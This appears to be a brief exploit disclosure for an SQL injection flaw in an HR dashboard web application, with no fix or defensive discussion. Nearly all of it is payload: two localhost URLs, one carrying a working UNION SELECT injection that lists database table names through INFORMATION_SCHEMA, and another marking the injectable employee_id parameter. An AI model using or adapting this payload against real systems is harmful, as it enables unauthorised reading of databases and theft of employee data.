The vulnerability allows an employee users to inject SQL commands.
http://localhost/[PATH]/?hr-dashboard=user&page;=message&tab;=view_message&from;=inbox&id;=[SQL]-23+union+select 1,2,3,4,5,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),7,8–%20- http://localhost/[PATH]/?hr-dashboard=user&page;=user&tab;=view_employee&action;=view&employee;_id=[SQL]